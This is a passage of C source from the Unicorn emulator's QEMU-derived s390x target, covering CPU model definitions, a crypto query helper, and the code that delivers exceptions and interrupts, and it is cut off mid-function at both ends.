matching_cpu_type = def; } last_compatible = def; } /* prefer the model with the same cpu type, esp. 
don't take the BC for EC */ if (matching_cpu_type) { return matching_cpu_type; } return last_compatible; } static S390CPUModel *get_max_cpu_model(void); static S390CPUModel *get_max_cpu_model(void) { static S390CPUModel max_model; static bool cached; if (cached) { return &max_model; } max_model.def = s390_find_cpu_def(QEMU_MAX_CPU_TYPE, QEMU_MAX_CPU_GEN, QEMU_MAX_CPU_EC_GA, NULL); bitmap_copy(max_model.features, qemu_max_cpu_feat, S390_FEAT_MAX); cached = true; return &max_model; } static inline void apply_cpu_model(const S390CPUModel *model) { static S390CPUModel applied_model; static bool applied; /* * We have the same model for all VCPUs. KVM can only be configured before * any VCPUs are defined in KVM. */ if (applied) { if (model && memcmp(&applied_model, model, sizeof(S390CPUModel))) { // error_setg(errp, "Mixed CPU models are not supported on s390x."); } return; } applied = true; if (model) { applied_model = *model; } } void s390_realize_cpu_model(CPUState *cs) { S390CPU *cpu = S390_CPU(cs); const S390CPUModel *max_model; if (!cpu->model) { /* no host model support -> perform compatibility stuff */ apply_cpu_model(NULL); return; } max_model = get_max_cpu_model(); if (!max_model) { //error_prepend(errp, "CPU models are not available: "); return; } /* copy over properties that can vary */ cpu->model->lowest_ibc = max_model->lowest_ibc; cpu->model->cpu_id = max_model->cpu_id; cpu->model->cpu_id_format = max_model->cpu_id_format; cpu->model->cpu_ver = max_model->cpu_ver; apply_cpu_model(cpu->model); cpu->env.cpuid = s390_cpuid_from_cpu_model(cpu->model); /* basic mode, write the cpu address into the first 4 bit of the ID */ cpu->env.cpuid = deposit64(cpu->env.cpuid, 54, 4, cpu->env.core_id); } static void s390_cpu_model_initfn(CPUState *obj) { S390CPU *cpu = S390_CPU(obj); S390CPUClass *xcc = S390_CPU_GET_CLASS(cpu); cpu->model = g_malloc0(sizeof(*cpu->model)); /* copy the model, so we can modify it */ cpu->model->def = xcc->cpu_def; if (xcc->is_static) { /* base model - features will never change */ bitmap_copy(cpu->model->features, cpu->model->def->base_feat, S390_FEAT_MAX); } else { /* latest model - features can change */ bitmap_copy(cpu->model->features, cpu->model->def->default_feat, S390_FEAT_MAX); } } static S390CPUDef s390_qemu_cpu_def; static S390CPUModel s390_qemu_cpu_model; /* Set the qemu CPU model (on machine initialization). Must not be called * once CPUs have been created. */ void s390_set_qemu_cpu_model(uint16_t type, uint8_t gen, uint8_t ec_ga, const S390FeatInit feat_init) { const S390CPUDef *def = s390_find_cpu_def(type, gen, ec_ga, NULL); g_assert(def); //g_assert(QTAILQ_EMPTY_RCU(&cpus)); /* TCG emulates some features that can usually not be enabled with * the emulated machine generation. Make sure they can be enabled * when using the QEMU model by adding them to full_feat. We have * to copy the definition to do that. 
*/ memcpy(&s390_qemu_cpu_def, def, sizeof(s390_qemu_cpu_def)); bitmap_or(s390_qemu_cpu_def.full_feat, s390_qemu_cpu_def.full_feat, qemu_max_cpu_feat, S390_FEAT_MAX); /* build the CPU model */ s390_qemu_cpu_model.def = &s390_qemu_cpu_def; bitmap_zero(s390_qemu_cpu_model.features, S390_FEAT_MAX); s390_init_feat_bitmap(feat_init, s390_qemu_cpu_model.features); } static void s390_qemu_cpu_model_initfn(CPUState *obj) { S390CPU *cpu = S390_CPU(obj); cpu->model = g_malloc0(sizeof(*cpu->model)); /* copy the CPU model so we can modify it */ memcpy(cpu->model, &s390_qemu_cpu_model, sizeof(*cpu->model)); } static void s390_max_cpu_model_initfn(CPUState *obj) { const S390CPUModel *max_model; S390CPU *cpu = S390_CPU(obj); max_model = get_max_cpu_model(); cpu->model = g_new(S390CPUModel, 1); /* copy the CPU model so we can modify it */ memcpy(cpu->model, max_model, sizeof(*cpu->model)); } void s390_cpu_model_finalize(CPUState *obj) { S390CPU *cpu = S390_CPU(obj); g_free(cpu->model); g_free(cpu->ss.keydata); cpu->model = NULL; } static void s390_base_cpu_model_class_init(struct uc_struct *uc, CPUClass *oc, void *data) { S390CPUClass *xcc = S390_CPU_CLASS(oc); /* all base models are migration safe */ xcc->cpu_def = (const S390CPUDef *) data; xcc->is_static = true; // xcc->desc = xcc->cpu_def->desc; } static void s390_cpu_model_class_init(struct uc_struct *uc, CPUClass *oc, void *data) { S390CPUClass *xcc = S390_CPU_CLASS(oc); /* model that can change between QEMU versions */ xcc->cpu_def = (const S390CPUDef *) data; // xcc->is_migration_safe = true; // xcc->desc = xcc->cpu_def->desc; } static void s390_qemu_cpu_model_class_init(struct uc_struct *uc, CPUClass *oc, void *data) { //S390CPUClass *xcc = S390_CPU_CLASS(oc); //xcc->desc = g_strdup_printf("QEMU Virtual CPU version %s", // qemu_hw_version()); } static void s390_max_cpu_model_class_init(struct uc_struct *uc, CPUClass *oc, void *data) { //S390CPUClass *xcc = S390_CPU_CLASS(oc); /* * The "max" model is neither static nor migration safe. Under KVM * it represents the "host" model. Under TCG it represents some kind of * "qemu" CPU model without compat handling and maybe with some additional * CPU features that are not yet unlocked in the "qemu" model. 
*/ //xcc->desc = // "Enables all features supported by the accelerator in the current host"; } static void init_ignored_base_feat(void) { static const int feats[] = { /* MSA subfunctions that could not be available on certain machines */ S390_FEAT_KMAC_DEA, S390_FEAT_KMAC_TDEA_128, S390_FEAT_KMAC_TDEA_192, S390_FEAT_KMC_DEA, S390_FEAT_KMC_TDEA_128, S390_FEAT_KMC_TDEA_192, S390_FEAT_KM_DEA, S390_FEAT_KM_TDEA_128, S390_FEAT_KM_TDEA_192, S390_FEAT_KIMD_SHA_1, S390_FEAT_KLMD_SHA_1, /* CSSKE is deprecated on newer generations */ S390_FEAT_CONDITIONAL_SSKE, }; int i; for (i = 0; i < ARRAY_SIZE(feats); i++) { set_bit(feats[i], ignored_base_feat); } } void s390_init_cpu_model(uc_engine *uc, uc_cpu_s390x cpu_model) { static const S390FeatInit qemu_latest_init = { S390_FEAT_LIST_QEMU_LATEST }; int i; init_ignored_base_feat(); /* init all bitmaps from generated data initially */ s390_init_feat_bitmap(qemu_max_cpu_feat_init, qemu_max_cpu_feat); for (i = 0; i < ARRAY_SIZE(s390_cpu_defs); i++) { s390_init_feat_bitmap(s390_cpu_defs[i].base_init, s390_cpu_defs[i].base_feat); s390_init_feat_bitmap(s390_cpu_defs[i].default_init, s390_cpu_defs[i].default_feat); s390_init_feat_bitmap(s390_cpu_defs[i].full_init, s390_cpu_defs[i].full_feat); } /* initialize the qemu model with latest definition */ s390_set_qemu_cpu_model(QEMU_MAX_CPU_TYPE, QEMU_MAX_CPU_GEN, QEMU_MAX_CPU_EC_GA, qemu_latest_init); if (cpu_model < ARRAY_SIZE(s390_cpu_defs)) { s390_base_cpu_model_class_init(uc, uc->cpu->cc, (void *) &s390_cpu_defs[cpu_model]); s390_cpu_model_class_init(uc, uc->cpu->cc, (void *) &s390_cpu_defs[cpu_model]); s390_cpu_model_initfn(uc->cpu); } else if (cpu_model == UC_CPU_S390X_MAX) { s390_max_cpu_model_class_init(uc, uc->cpu->cc, NULL); s390_max_cpu_model_initfn(uc->cpu); } else if (cpu_model == UC_CPU_S390X_QEMU) { s390_qemu_cpu_model_class_init(uc, uc->cpu->cc, NULL); s390_qemu_cpu_model_initfn(uc->cpu); } }
/* unicorn-2.1.1/qemu/target/s390x/cpu_models.h */
/* * CPU models for s390x * * Copyright 2016 IBM Corp. * * Author(s): David Hildenbrand <dahi@linux.vnet.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory.
*/ #ifndef TARGET_S390X_CPU_MODELS_H #define TARGET_S390X_CPU_MODELS_H #include "cpu_features.h" #include "gen-features.h" #include "hw/core/cpu.h" #include "unicorn/s390x.h" #include "uc_priv.h" /* static CPU definition */ struct S390CPUDef { const char *name; /* name exposed to the user */ const char *desc; /* description exposed to the user */ uint8_t gen; /* hw generation identification */ uint16_t type; /* cpu type identification */ uint8_t ec_ga; /* EC GA version (on which also the BC is based) */ uint8_t mha_pow; /* Maximum Host Address Power, mha = 2^pow-1 */ uint32_t hmfai; /* hypervisor-managed facilities */ /* base/min features, must never be changed between QEMU versions */ S390FeatBitmap base_feat; /* used to init base_feat from generated data */ S390FeatInit base_init; /* default features, QEMU version specific */ S390FeatBitmap default_feat; /* used to init default_feat from generated data */ S390FeatInit default_init; /* max allowed features, QEMU version specific */ S390FeatBitmap full_feat; /* used to init full_feat from generated data */ S390FeatInit full_init; }; /* CPU model based on a CPU definition */ struct S390CPUModel { const S390CPUDef *def; S390FeatBitmap features; /* values copied from the "host" model, can change during migration */ uint16_t lowest_ibc; /* lowest IBC that the hardware supports */ uint32_t cpu_id; /* CPU id */ uint8_t cpu_id_format; /* CPU id format bit */ uint8_t cpu_ver; /* CPU version, usually "ff" for kvm */ }; /* * CPU ID * * bits 0-7: Zeroes (ff for kvm) * bits 8-31: CPU ID (serial number) * bits 32-47: Machine type * bit 48: CPU ID format * bits 49-63: Zeroes */ #define cpuid_type(x) (((x) >> 16) & 0xffff) #define cpuid_id(x) (((x) >> 32) & 0xffffff) #define cpuid_ver(x) (((x) >> 56) & 0xff) #define cpuid_format(x) (((x) >> 15) & 0x1) #define lowest_ibc(x) (((uint32_t)(x) >> 16) & 0xfff) #define unblocked_ibc(x) ((uint32_t)(x) & 0xfff) #define has_ibc(x) (lowest_ibc(x) != 0) #define S390_GEN_Z10 0xa #define ibc_gen(x) (x == 0 ? 0 : ((x >> 4) + S390_GEN_Z10)) #define ibc_ec_ga(x) (x & 0xf) void s390_cpudef_featoff(uint8_t gen, uint8_t ec_ga, S390Feat feat); void s390_cpudef_featoff_greater(uint8_t gen, uint8_t ec_ga, S390Feat feat); void s390_cpudef_group_featoff_greater(uint8_t gen, uint8_t ec_ga, S390FeatGroup group); uint32_t s390_get_hmfai(void); uint8_t s390_get_mha_pow(void); uint32_t s390_get_ibc_val(void); static inline uint16_t s390_ibc_from_cpu_model(const S390CPUModel *model) { uint16_t ibc = 0; if (model->def->gen >= S390_GEN_Z10) { ibc = ((model->def->gen - S390_GEN_Z10) << 4) + model->def->ec_ga; } return ibc; } void s390_get_feat_block(struct uc_struct *uc, S390FeatType type, uint8_t *data); bool s390_has_feat(struct uc_struct *uc, S390Feat feat); uint8_t s390_get_gen_for_cpu_type(uint16_t type); static inline bool s390_known_cpu_type(uint16_t type) { return s390_get_gen_for_cpu_type(type) != 0; } static inline uint64_t s390_cpuid_from_cpu_model(const S390CPUModel *model) { return ((uint64_t)model->cpu_ver << 56) | ((uint64_t)model->cpu_id << 32) | ((uint64_t)model->def->type << 16) | (model->def->gen == 7 ?
0 : (uint64_t)model->cpu_id_format << 15); } S390CPUDef const *s390_find_cpu_def(uint16_t type, uint8_t gen, uint8_t ec_ga, S390FeatBitmap features); void s390_init_cpu_model(uc_engine *uc, uc_cpu_s390x cpu_model); void s390_cpu_model_finalize(CPUState *obj); #endif /* TARGET_S390X_CPU_MODELS_H */
/* unicorn-2.1.1/qemu/target/s390x/crypto_helper.c */
/* * s390x crypto helpers * * Copyright (c) 2017 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "internal.h" #include "tcg_s390x.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" uint32_t HELPER(msa)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t r3, uint32_t type) { const uintptr_t ra = GETPC(); const uint8_t mod = env->regs[0] & 0x80ULL; const uint8_t fc = env->regs[0] & 0x7fULL; uint8_t subfunc[16] = { 0 }; uint64_t param_addr; int i; switch (type) { case S390_FEAT_TYPE_KMAC: case S390_FEAT_TYPE_KIMD: case S390_FEAT_TYPE_KLMD: case S390_FEAT_TYPE_PCKMO: case S390_FEAT_TYPE_PCC: if (mod) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } break; } s390_get_feat_block(env->uc, type, subfunc); if (!test_be_bit(fc, subfunc)) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } switch (fc) { case 0: /* query subfunction */ for (i = 0; i < 16; i++) { param_addr = wrap_address(env, env->regs[1] + i); cpu_stb_data_ra(env, param_addr, subfunc[i], ra); } break; default: /* we don't implement any other subfunction yet */ g_assert_not_reached(); } return 0; }
/* unicorn-2.1.1/qemu/target/s390x/excp_helper.c */
/* * s390x exception / interrupt helpers * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2011 Alexander Graf * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version.
* * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/helper-proto.h" #include "qemu/timer.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "hw/s390x/ioinst.h" //include "exec/address-spaces.h" #include "tcg_s390x.h" #include "sysemu/sysemu.h" //#include "hw/s390x/s390_flic.h" void QEMU_NORETURN tcg_s390_program_interrupt(CPUS390XState *env, uint32_t code, uintptr_t ra) { CPUState *cs = env_cpu(env); cpu_restore_state(cs, ra, true); //qemu_log_mask(CPU_LOG_INT, "program interrupt at %#" PRIx64 "\n", // env->psw.addr); trigger_pgm_exception(env, code); cpu_loop_exit(cs); } void QEMU_NORETURN tcg_s390_data_exception(CPUS390XState *env, uint32_t dxc, uintptr_t ra) { g_assert(dxc <= 0xff); /* Store the DXC into the lowcore */ #ifdef UNICORN_ARCH_POSTFIX glue(stl_phys, UNICORN_ARCH_POSTFIX)(env->uc, env_cpu(env)->as, env->psa + offsetof(LowCore, data_exc_code), dxc); #else stl_phys(env->uc, env_cpu(env)->as, env->psa + offsetof(LowCore, data_exc_code), dxc); #endif /* Store the DXC into the FPC if AFP is enabled */ if (env->cregs[0] & CR0_AFP) { env->fpc = deposit32(env->fpc, 8, 8, dxc); } tcg_s390_program_interrupt(env, PGM_DATA, ra); } void QEMU_NORETURN tcg_s390_vector_exception(CPUS390XState *env, uint32_t vxc, uintptr_t ra) { g_assert(vxc <= 0xff); /* Always store the VXC into the lowcore, without AFP it is undefined */ #ifdef UNICORN_ARCH_POSTFIX glue(stl_phys, UNICORN_ARCH_POSTFIX)(env->uc, env_cpu(env)->as, env->psa + offsetof(LowCore, data_exc_code), vxc); #else stl_phys(env->uc, env_cpu(env)->as, env->psa + offsetof(LowCore, data_exc_code), vxc); #endif /* Always store the VXC into the FPC, without AFP it is undefined */ env->fpc = deposit32(env->fpc, 8, 8, vxc); tcg_s390_program_interrupt(env, PGM_VECTOR_PROCESSING, ra); } void HELPER(data_exception)(CPUS390XState *env, uint32_t dxc) { tcg_s390_data_exception(env, dxc, GETPC()); } static inline uint64_t cpu_mmu_idx_to_asc(int mmu_idx) { switch (mmu_idx) { case MMU_PRIMARY_IDX: return PSW_ASC_PRIMARY; case MMU_SECONDARY_IDX: return PSW_ASC_SECONDARY; case MMU_HOME_IDX: return PSW_ASC_HOME; default: abort(); } } bool s390_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr) { S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; target_ulong vaddr, raddr; uint64_t asc, tec; int prot, excp; //qemu_log_mask(CPU_LOG_MMU, "%s: addr 0x%" VADDR_PRIx " rw %d mmu_idx %d\n", // __func__, address, access_type, mmu_idx); vaddr = address; if (mmu_idx < MMU_REAL_IDX) { asc = cpu_mmu_idx_to_asc(mmu_idx); /* 31-Bit mode */ if (!(env->psw.mask & PSW_MASK_64)) { vaddr &= 0x7fffffff; } excp = mmu_translate(env, vaddr, access_type, asc, &raddr, &prot, &tec); } else if (mmu_idx == MMU_REAL_IDX) { /* 31-Bit mode */ if (!(env->psw.mask & PSW_MASK_64)) { vaddr &= 0x7fffffff; } excp = mmu_translate_real(env, vaddr, access_type, &raddr, &prot, &tec); } else { g_assert_not_reached(); } /* check out of RAM access */ if (!excp && !address_space_access_valid(env_cpu(env)->as, raddr, TARGET_PAGE_SIZE, access_type, MEMTXATTRS_UNSPECIFIED)) { 
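/*
 * The MMU translation itself succeeded, but the resulting real address
 * does not map to valid guest memory, so fall through to reporting an
 * addressing exception (PGM_ADDRESSING) below instead of installing a
 * TLB entry.
 */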
//qemu_log_mask(CPU_LOG_MMU, // "%s: raddr %" PRIx64 " > ram_size %" PRIx64 "\n", // __func__, (uint64_t)raddr, (uint64_t)ram_size); excp = PGM_ADDRESSING; tec = 0; /* unused */ } if (!excp) { //qemu_log_mask(CPU_LOG_MMU, // "%s: set tlb %" PRIx64 " -> %" PRIx64 " (%x)\n", // __func__, (uint64_t)vaddr, (uint64_t)raddr, prot); tlb_set_page(cs, address & TARGET_PAGE_MASK, raddr, prot, mmu_idx, TARGET_PAGE_SIZE); return true; } if (probe) { return false; } if (excp != PGM_ADDRESSING) { #ifdef UNICORN_ARCH_POSTFIX glue(stq_phys, UNICORN_ARCH_POSTFIX)(cs->uc, env_cpu(env)->as, env->psa + offsetof(LowCore, trans_exc_code), tec); #else stq_phys(cs->uc, env_cpu(env)->as, env->psa + offsetof(LowCore, trans_exc_code), tec); #endif } /* * For data accesses, ILEN will be filled in from the unwind info, * within cpu_loop_exit_restore. For code accesses, retaddr == 0, * and so unwinding will not occur. However, ILEN is also undefined * for that case -- we choose to set ILEN = 2. */ env->int_pgm_ilen = 2; trigger_pgm_exception(env, excp); cpu_loop_exit_restore(cs, retaddr); } #if 0 static void do_program_interrupt(CPUS390XState *env) { uint64_t mask, addr; LowCore *lowcore; int ilen = env->int_pgm_ilen; assert(ilen == 2 || ilen == 4 || ilen == 6); switch (env->int_pgm_code) { case PGM_PER: if (env->per_perc_atmid & PER_CODE_EVENT_NULLIFICATION) { break; } /* FALL THROUGH */ case PGM_OPERATION: case PGM_PRIVILEGED: case PGM_EXECUTE: case PGM_PROTECTION: case PGM_ADDRESSING: case PGM_SPECIFICATION: case PGM_DATA: case PGM_FIXPT_OVERFLOW: case PGM_FIXPT_DIVIDE: case PGM_DEC_OVERFLOW: case PGM_DEC_DIVIDE: case PGM_HFP_EXP_OVERFLOW: case PGM_HFP_EXP_UNDERFLOW: case PGM_HFP_SIGNIFICANCE: case PGM_HFP_DIVIDE: case PGM_TRANS_SPEC: case PGM_SPECIAL_OP: case PGM_OPERAND: case PGM_HFP_SQRT: case PGM_PC_TRANS_SPEC: case PGM_ALET_SPEC: case PGM_MONITOR: /* advance the PSW if our exception is not nullifying */ env->psw.addr += ilen; break; } //qemu_log_mask(CPU_LOG_INT, // "%s: code=0x%x ilen=%d psw: %" PRIx64 " %" PRIx64 "\n", // __func__, env->int_pgm_code, ilen, env->psw.mask, // env->psw.addr); lowcore = cpu_map_lowcore(env); /* Signal PER events with the exception. */ if (env->per_perc_atmid) { env->int_pgm_code |= PGM_PER; lowcore->per_address = cpu_to_be64(env->per_address); lowcore->per_perc_atmid = cpu_to_be16(env->per_perc_atmid); env->per_perc_atmid = 0; } lowcore->pgm_ilen = cpu_to_be16(ilen); lowcore->pgm_code = cpu_to_be16(env->int_pgm_code); lowcore->program_old_psw.mask = cpu_to_be64(get_psw_mask(env)); lowcore->program_old_psw.addr = cpu_to_be64(env->psw.addr); mask = be64_to_cpu(lowcore->program_new_psw.mask); addr = be64_to_cpu(lowcore->program_new_psw.addr); lowcore->per_breaking_event_addr = cpu_to_be64(env->gbea); cpu_unmap_lowcore(lowcore); load_psw(env, mask, addr); } static void do_svc_interrupt(CPUS390XState *env) { uint64_t mask, addr; LowCore *lowcore; lowcore = cpu_map_lowcore(env); lowcore->svc_code = cpu_to_be16(env->int_svc_code); lowcore->svc_ilen = cpu_to_be16(env->int_svc_ilen); lowcore->svc_old_psw.mask = cpu_to_be64(get_psw_mask(env)); lowcore->svc_old_psw.addr = cpu_to_be64(env->psw.addr + env->int_svc_ilen); mask = be64_to_cpu(lowcore->svc_new_psw.mask); addr = be64_to_cpu(lowcore->svc_new_psw.addr); cpu_unmap_lowcore(lowcore); load_psw(env, mask, addr); /* When a PER event is pending, the PER exception has to happen immediately after the SERVICE CALL one. 
*/ if (env->per_perc_atmid) { env->int_pgm_code = PGM_PER; env->int_pgm_ilen = env->int_svc_ilen; do_program_interrupt(env); } } #define VIRTIO_SUBCODE_64 0x0D00 static void do_ext_interrupt(CPUS390XState *env) { QEMUS390FLICState *flic = QEMU_S390_FLIC(s390_get_flic()); S390CPU *cpu = env_archcpu(env); uint64_t mask, addr; uint16_t cpu_addr; LowCore *lowcore; if (!(env->psw.mask & PSW_MASK_EXT)) { cpu_abort(CPU(cpu), "Ext int w/o ext mask\n"); } lowcore = cpu_map_lowcore(env); if ((env->pending_int & INTERRUPT_EMERGENCY_SIGNAL) && (env->cregs[0] & CR0_EMERGENCY_SIGNAL_SC)) { MachineState *ms = MACHINE(qdev_get_machine()); unsigned int max_cpus = ms->smp.max_cpus; lowcore->ext_int_code = cpu_to_be16(EXT_EMERGENCY); cpu_addr = find_first_bit(env->emergency_signals, S390_MAX_CPUS); g_assert(cpu_addr < S390_MAX_CPUS); lowcore->cpu_addr = cpu_to_be16(cpu_addr); clear_bit(cpu_addr, env->emergency_signals); if (bitmap_empty(env->emergency_signals, max_cpus)) { env->pending_int &= ~INTERRUPT_EMERGENCY_SIGNAL; } } else if ((env->pending_int & INTERRUPT_EXTERNAL_CALL) && (env->cregs[0] & CR0_EXTERNAL_CALL_SC)) { lowcore->ext_int_code = cpu_to_be16(EXT_EXTERNAL_CALL); lowcore->cpu_addr = cpu_to_be16(env->external_call_addr); env->pending_int &= ~INTERRUPT_EXTERNAL_CALL; } else if ((env->pending_int & INTERRUPT_EXT_CLOCK_COMPARATOR) && (env->cregs[0] & CR0_CKC_SC)) { lowcore->ext_int_code = cpu_to_be16(EXT_CLOCK_COMP); lowcore->cpu_addr = 0; env->pending_int &= ~INTERRUPT_EXT_CLOCK_COMPARATOR; } else if ((env->pending_int & INTERRUPT_EXT_CPU_TIMER) && (env->cregs[0] & CR0_CPU_TIMER_SC)) { lowcore->ext_int_code = cpu_to_be16(EXT_CPU_TIMER); lowcore->cpu_addr = 0; env->pending_int &= ~INTERRUPT_EXT_CPU_TIMER; } else if (qemu_s390_flic_has_service(flic) && (env->cregs[0] & CR0_SERVICE_SC)) { uint32_t param; param = qemu_s390_flic_dequeue_service(flic); lowcore->ext_int_code = cpu_to_be16(EXT_SERVICE); lowcore->ext_params = cpu_to_be32(param); lowcore->cpu_addr = 0; } else { g_assert_not_reached(); } mask = be64_to_cpu(lowcore->external_new_psw.mask); addr = be64_to_cpu(lowcore->external_new_psw.addr); lowcore->external_old_psw.mask = cpu_to_be64(get_psw_mask(env)); lowcore->external_old_psw.addr = cpu_to_be64(env->psw.addr); cpu_unmap_lowcore(lowcore); load_psw(env, mask, addr); } static void do_io_interrupt(CPUS390XState *env) { QEMUS390FLICState *flic = QEMU_S390_FLIC(s390_get_flic()); uint64_t mask, addr; QEMUS390FlicIO *io; LowCore *lowcore; g_assert(env->psw.mask & PSW_MASK_IO); io = qemu_s390_flic_dequeue_io(flic, env->cregs[6]); g_assert(io); lowcore = cpu_map_lowcore(env); lowcore->subchannel_id = cpu_to_be16(io->id); lowcore->subchannel_nr = cpu_to_be16(io->nr); lowcore->io_int_parm = cpu_to_be32(io->parm); lowcore->io_int_word = cpu_to_be32(io->word); lowcore->io_old_psw.mask = cpu_to_be64(get_psw_mask(env)); lowcore->io_old_psw.addr = cpu_to_be64(env->psw.addr); mask = be64_to_cpu(lowcore->io_new_psw.mask); addr = be64_to_cpu(lowcore->io_new_psw.addr); cpu_unmap_lowcore(lowcore); g_free(io); load_psw(env, mask, addr); } typedef struct MchkExtSaveArea { uint64_t vregs[32][2]; /* 0x0000 */ uint8_t pad_0x0200[0x0400 - 0x0200]; /* 0x0200 */ } MchkExtSaveArea; QEMU_BUILD_BUG_ON(sizeof(MchkExtSaveArea) != 1024); static int mchk_store_vregs(CPUS390XState *env, uint64_t mcesao) { hwaddr len = sizeof(MchkExtSaveArea); MchkExtSaveArea *sa; int i; sa = cpu_physical_memory_map(env_cpu(env)->as, mcesao, &len, true); if (!sa) { return -EFAULT; } if (len != sizeof(MchkExtSaveArea)) { 
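/* The mapping came back shorter than requested: undo it without marking
 * any bytes dirty (access_len 0) and report the failure to the caller. */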
cpu_physical_memory_unmap(env_cpu(env)->as, sa, len, 1, 0); return -EFAULT; } for (i = 0; i < 32; i++) { sa->vregs[i][0] = cpu_to_be64(env->vregs[i][0]); sa->vregs[i][1] = cpu_to_be64(env->vregs[i][1]); } cpu_physical_memory_unmap(env_cpu(env)->as, sa, len, 1, len); return 0; } static void do_mchk_interrupt(CPUS390XState *env) { QEMUS390FLICState *flic = QEMU_S390_FLIC(s390_get_flic()); uint64_t mcic = s390_build_validity_mcic() | MCIC_SC_CP; uint64_t mask, addr, mcesao = 0; LowCore *lowcore; int i; /* for now we only support channel report machine checks (floating) */ g_assert(env->psw.mask & PSW_MASK_MCHECK); g_assert(env->cregs[14] & CR14_CHANNEL_REPORT_SC); qemu_s390_flic_dequeue_crw_mchk(flic); lowcore = cpu_map_lowcore(env); /* extended save area */ if (mcic & MCIC_VB_VR) { /* length and alignment is 1024 bytes */ mcesao = be64_to_cpu(lowcore->mcesad) & ~0x3ffull; } /* try to store vector registers */ if (!mcesao || mchk_store_vregs(env, mcesao)) { mcic &= ~MCIC_VB_VR; } /* we are always in z/Architecture mode */ lowcore->ar_access_id = 1; for (i = 0; i < 16; i++) { lowcore->floating_pt_save_area[i] = cpu_to_be64(*get_freg(env, i)); lowcore->gpregs_save_area[i] = cpu_to_be64(env->regs[i]); lowcore->access_regs_save_area[i] = cpu_to_be32(env->aregs[i]); lowcore->cregs_save_area[i] = cpu_to_be64(env->cregs[i]); } lowcore->prefixreg_save_area = cpu_to_be32(env->psa); lowcore->fpt_creg_save_area = cpu_to_be32(env->fpc); lowcore->tod_progreg_save_area = cpu_to_be32(env->todpr); lowcore->cpu_timer_save_area = cpu_to_be64(env->cputm); lowcore->clock_comp_save_area = cpu_to_be64(env->ckc >> 8); lowcore->mcic = cpu_to_be64(mcic); lowcore->mcck_old_psw.mask = cpu_to_be64(get_psw_mask(env)); lowcore->mcck_old_psw.addr = cpu_to_be64(env->psw.addr); mask = be64_to_cpu(lowcore->mcck_new_psw.mask); addr = be64_to_cpu(lowcore->mcck_new_psw.addr); cpu_unmap_lowcore(lowcore); load_psw(env, mask, addr); } void s390_cpu_do_interrupt(CPUState *cs) { QEMUS390FLICState *flic = QEMU_S390_FLIC(s390_get_flic()); S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; bool stopped = false; //qemu_log_mask(CPU_LOG_INT, "%s: %d at psw=%" PRIx64 ":%" PRIx64 "\n", // __func__, cs->exception_index, env->psw.mask, env->psw.addr); try_deliver: /* handle machine checks */ if (cs->exception_index == -1 && s390_cpu_has_mcck_int(cpu)) { cs->exception_index = EXCP_MCHK; } /* handle external interrupts */ if (cs->exception_index == -1 && s390_cpu_has_ext_int(cpu)) { cs->exception_index = EXCP_EXT; } /* handle I/O interrupts */ if (cs->exception_index == -1 && s390_cpu_has_io_int(cpu)) { cs->exception_index = EXCP_IO; } /* RESTART interrupt */ if (cs->exception_index == -1 && s390_cpu_has_restart_int(cpu)) { cs->exception_index = EXCP_RESTART; } /* STOP interrupt has least priority */ if (cs->exception_index == -1 && s390_cpu_has_stop_int(cpu)) { cs->exception_index = EXCP_STOP; } switch (cs->exception_index) { case EXCP_PGM: do_program_interrupt(env); break; case EXCP_SVC: do_svc_interrupt(env); break; case EXCP_EXT: do_ext_interrupt(env); break; case EXCP_IO: do_io_interrupt(env); break; case EXCP_MCHK: do_mchk_interrupt(env); break; case EXCP_RESTART: do_restart_interrupt(env); break; case EXCP_STOP: do_stop_interrupt(env); stopped = true; break; } if (cs->exception_index != -1 && !stopped) { /* check if there are more pending interrupts to deliver */ cs->exception_index = -1; goto try_deliver; } cs->exception_index = -1; /* we might still have pending interrupts, but not deliverable */ if (!env->pending_int && 
!qemu_s390_flic_has_any(flic)) { cs->interrupt_request &= ~CPU_INTERRUPT_HARD; } /* WAIT PSW during interrupt injection or STOP interrupt */ if ((env->psw.mask & PSW_MASK_WAIT) || stopped) { /* don't trigger a cpu_loop_exit(), use an interrupt instead */ cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HALT); } else if (cs->halted) { /* unhalt if we had a WAIT PSW somewhere in our injection chain */ s390_cpu_unhalt(cpu); } } #endif bool s390_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { if (interrupt_request & CPU_INTERRUPT_HARD) { S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; if (env->ex_value) { /* Execution of the target insn is indivisible from the parent EXECUTE insn. */ return false; } if (s390_cpu_has_int(cpu)) { //s390_cpu_do_interrupt(cs); return true; } if (env->psw.mask & PSW_MASK_WAIT) { /* Woken up because of a floating interrupt but it has already * been delivered. Go back to sleep. */ cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HALT); } } return false; } void s390x_cpu_debug_excp_handler(CPUState *cs) { S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; CPUWatchpoint *wp_hit = cs->watchpoint_hit; if (wp_hit && wp_hit->flags & BP_CPU) { /* FIXME: When the storage-alteration-space control bit is set, the exception should only be triggered if the memory access is done using an address space with the storage-alteration-event bit set. We have no way to detect that with the current watchpoint code. */ cs->watchpoint_hit = NULL; 